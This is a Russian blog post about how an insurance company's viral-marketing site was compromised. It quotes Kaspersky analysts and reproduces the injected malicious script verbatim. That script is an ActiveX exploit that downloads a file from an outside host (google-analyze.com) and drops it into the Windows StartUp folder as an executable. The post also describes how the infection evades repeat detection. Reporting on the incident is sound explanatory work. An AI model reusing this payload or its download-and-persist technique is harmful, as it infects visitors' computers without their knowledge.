Вирус от маркетологов или настоящий вирус?

Не успели мы пообщаться с adme.ru по поводу политики взаимоцитирования в рамках этого материала, как история с вирусным маркетингом Альфы получила неожиданное развитие. Долгая и продолжительная история отношений с маком отучила меня воспринимать вирусы как то, что может угрожать компьютеру и его безопасности, поэтому я проигнорировал предупреждение Safari о том, что сайт alfastrah.ru может содержать вредоносное ПО.

Picture 62

Сегодня вечером от знакомых из Лаборатории Касперского узнал, что на сайте есть кусок кода, который и превращает рекламный вирус в компьютерный. Оказывается осторожничать с этой ссылкой нужно было не только из-за звука флешки. Не вдаваясь в технические подробности — приведу пару скриншотов и комментарии от специалистов.

alfa3

image002

Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус. Интересен способ внедрения: он вставлен аккуратно в центр страницы. Грузит вот что (скрипт даже не зашифрован): http://google-analyze.com/counter/index.php.

HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid=»clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9″ id=»attack»></object>
<script>
var arbitrary_file = «http://google-analyze.com/tracker/load.php&#187;;
var destination = ‘c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe’;
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src=»pdf.php» type=»application/pdf» width=100 height=100></embed>

У вируса есть особенность – блокировка загрузки при повторном посещении – вирус попадает на комп только при первой загрузке с какого-нибудь айпишника, при повторных уже нет. Так что если смотрят из конторы, где ходят через прокси – пострадает только первый посмотревший.
Для внедрения на сайт была использована незакрытая уязвимость.

Я полагаю, что аналитики из Касперского уже уведомили IT-департамент Альфы, что нужно лучше работать над безопасностью своих сайтов, однако на всякий случай напишу еще и маркетологам из Альфа-страхования. Однако интересная получается вещь — дырой воспользовались именно тогда, когда пошел рост заходов на сайт по экспоненте. Вот так иногда связаны рекламные и компьютерные вирусы ))

Picture 63

P.S. Пока что не дошли руки до подробного обзора, можно посмотреть ряд роликов про Блондинку-СИСадминку, в которых продвигается антивирус. Уж очень в тему для этой записи.

Advertisements

Автор: virusok

Специалист в области вирусного маркетинга, с огромным опытом проведения вирусных кампаний для таких брендов как Palmolive, Pioneer, Microsoft, TELE2, Тройка-Диалог, Bayer, Мега, Coca-Cola, РОСНО, Корбина, Mirax, Касперский, Beeline, МТТ, Intel, Альфа-Капитал, Electronics Arts, Аdrenalin Rush, Акадо, Motorola, Miller, РТР, Белый ветер, XXth Century Fox и других.

5 thoughts on “Вирус от маркетологов или настоящий вирус?”

  1. Автор, отлично. Только не скатитесь к Давыдову и не пихайте где только можно рекламу.

Обсуждение закрыто.